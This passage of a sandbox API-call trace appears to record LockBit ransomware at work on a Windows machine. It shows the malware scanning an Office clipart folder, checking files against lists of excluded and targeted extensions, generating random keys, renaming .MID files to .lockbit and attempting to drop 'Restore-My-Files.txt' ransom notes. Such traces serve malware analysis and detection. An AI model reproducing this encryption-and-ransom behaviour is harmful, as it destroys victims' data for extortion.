(lpString1=".lnk", lpString2=".txt") returned -1 [0173.639] lstrcmpiW (lpString1=".rdp", lpString2=".txt") returned -1 [0173.639] lstrcmpiW (lpString1=".lockbit", lpString2=".txt") returned -1 [0173.639] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Restore-My-Files.txt") returned 0 [0173.639] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5a89bd50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x175f, dwReserved0=0x0, dwReserved1=0x0, cFileName="ROAD_01.MID", cAlternateFileName="")) returned 1 [0173.639] lstrcmpiW (lpString1=".", lpString2="ROAD_01.MID") returned -1 [0173.639] lstrcmpiW (lpString1="..", lpString2="ROAD_01.MID") returned -1 [0173.639] PathFindExtensionW (pszPath="ROAD_01.MID") returned=".MID" [0173.639] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0173.639] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0173.639] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0173.640] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0173.640] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="ROAD_01.MID") returned -1 [0173.640] lstrcmpiW (lpString1="ntldr", lpString2="ROAD_01.MID") returned -1 [0173.640] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="ROAD_01.MID") returned -1 [0173.640] lstrcmpiW (lpString1="bootsect.bak", lpString2="ROAD_01.MID") returned -1 [0173.641] lstrcmpiW (lpString1="autorun.inf", lpString2="ROAD_01.MID") returned -1 [0173.641] lstrcmpiW (lpString1="thumbs.db", lpString2="ROAD_01.MID") returned 1 [0173.641] lstrcmpiW (lpString1="iconcache.db", lpString2="ROAD_01.MID") returned -1 [0173.641] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.641] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID") returned=".MID" [0173.641] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0173.641] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0173.641] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0173.642] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0173.642] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0173.642] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0173.642] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.lockbit") returned 71 [0173.642] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\road_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0173.646] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.646] malloc (_Size=0x40068) returned 0x3ef0008 [0173.646] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=5983) returned 1 [0173.646] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0173.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0173.647] ReadFile (in: hFile=0x170, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0173.649] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.649] malloc (_Size=0xa4) returned 0x1fa2ed8 [0173.649] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa4, FileInformationClass=0xa) returned 0x0 [0173.650] free (_Block=0x1fa2ed8) [0173.650] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ROAD_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.650] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.650] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x6d24dcb0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x278a, dwReserved0=0x0, dwReserved1=0x0, cFileName="SAFRI_01.MID", cAlternateFileName="")) returned 1 [0173.654] lstrcmpiW (lpString1=".", lpString2="SAFRI_01.MID") returned -1 [0173.654] lstrcmpiW (lpString1="..", lpString2="SAFRI_01.MID") returned -1 [0173.654] PathFindExtensionW (pszPath="SAFRI_01.MID") returned=".MID" [0173.654] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0173.654] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0173.655] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0173.655] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SAFRI_01.MID") returned -1 [0173.656] lstrcmpiW (lpString1="ntldr", lpString2="SAFRI_01.MID") returned -1 [0173.656] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SAFRI_01.MID") returned -1 [0173.656] lstrcmpiW (lpString1="bootsect.bak", lpString2="SAFRI_01.MID") returned -1 [0173.656] lstrcmpiW (lpString1="autorun.inf", lpString2="SAFRI_01.MID") returned -1 [0173.656] lstrcmpiW (lpString1="thumbs.db", lpString2="SAFRI_01.MID") returned 1 [0173.656] lstrcmpiW (lpString1="iconcache.db", lpString2="SAFRI_01.MID") returned -1 [0173.656] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.656] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID") returned=".MID" [0173.656] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0173.656] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0173.656] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0173.657] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".ndf", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".qry", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".sdb", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".sdf", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".sql", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".sqlite", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".sqlite3", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".sqlitedb", lpString2=".MID") returned 1 [0173.657] lstrcmpiW (lpString1=".tmd", lpString2=".MID") returned 1 [0173.657] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.lockbit") returned 72 [0173.657] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\safri_01.mid"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0173.664] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0173.664] malloc (_Size=0x40068) returned 0x3df0008 [0173.664] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=10122) returned 1 [0173.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.664] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.664] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0173.664] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0173.665] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0173.665] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0173.665] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0173.667] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0173.667] malloc (_Size=0xa6) returned 0x1fa2ed8 [0173.667] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0173.668] free (_Block=0x1fa2ed8) [0173.668] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SAFRI_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0173.668] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0173.668] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0173.669] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca0e1800, ftCreationTime.dwHighDateTime=0x1bd0320, ftLastAccessTime.dwLowDateTime=0x5a9342d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xca0e1800, ftLastWriteTime.dwHighDateTime=0x1bd0320, nFileSizeHigh=0x0, nFileSizeLow=0x13c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="SCHOL_02.MID", cAlternateFileName="")) returned 1 [0173.669] lstrcmpiW (lpString1=".", lpString2="SCHOL_02.MID") returned -1 [0173.669] lstrcmpiW (lpString1="..", lpString2="SCHOL_02.MID") returned -1 [0173.669] PathFindExtensionW (pszPath="SCHOL_02.MID") returned=".MID" [0173.669] lstrcmpiW (lpString1=".386", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".cmd", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".exe", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".ani", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".adv", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".theme", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".msi", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".msp", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".com", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".diagpkg", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".nls", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".diagcab", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".lock", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".ocx", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".mpa", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".cpl", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".mod", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".hta", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".icns", lpString2=".MID") returned -1 [0173.669] lstrcmpiW (lpString1=".prf", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".rtp", lpString2=".MID") returned 1 [0173.669] lstrcmpiW (lpString1=".diagcfg", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".msstyles", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".bin", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".shs", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".drv", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".wpx", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".bat", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".rom", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".msc", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".spl", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".ps1", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".msu", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".ics", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".key", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".mp3", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".reg", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".dll", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".ini", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".idx", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".sys", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".hlp", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".ico", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".lnk", lpString2=".MID") returned -1 [0173.670] lstrcmpiW (lpString1=".rdp", lpString2=".MID") returned 1 [0173.670] lstrcmpiW (lpString1=".lockbit", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SCHOL_02.MID") returned -1 [0173.671] lstrcmpiW (lpString1="ntldr", lpString2="SCHOL_02.MID") returned -1 [0173.671] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SCHOL_02.MID") returned -1 [0173.671] lstrcmpiW (lpString1="bootsect.bak", lpString2="SCHOL_02.MID") returned -1 [0173.671] lstrcmpiW (lpString1="autorun.inf", lpString2="SCHOL_02.MID") returned -1 [0173.671] lstrcmpiW (lpString1="thumbs.db", lpString2="SCHOL_02.MID") returned 1 [0173.671] lstrcmpiW (lpString1="iconcache.db", lpString2="SCHOL_02.MID") returned -1 [0173.671] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0173.671] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SCHOL_02.MID") returned=".MID" [0173.671] lstrcmpiW (lpString1=".rar", lpString2=".MID") returned 1 [0173.671] lstrcmpiW (lpString1=".zip", lpString2=".MID") returned 1 [0173.671] lstrcmpiW (lpString1=".7z", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".ckp", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".dacpac", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".db", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".db-shm", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".db-wal", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".db3", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".dbf", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".dbc", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".dbs", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".dbt", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".dbv", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".frm", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".mdf", lpString2=".MID") returned -1 [0173.671] lstrcmpiW (lpString1=".mrg", lpString2=".MID") returned 1 [0173.671] lstrcmpiW (lpString1=".mwb", lpString2=".MID") returned 1 [0173.672] lstrcmpiW (lpString1=".myd", lpString2=".MID") returned 1 [0173.672] lstrcmpiW 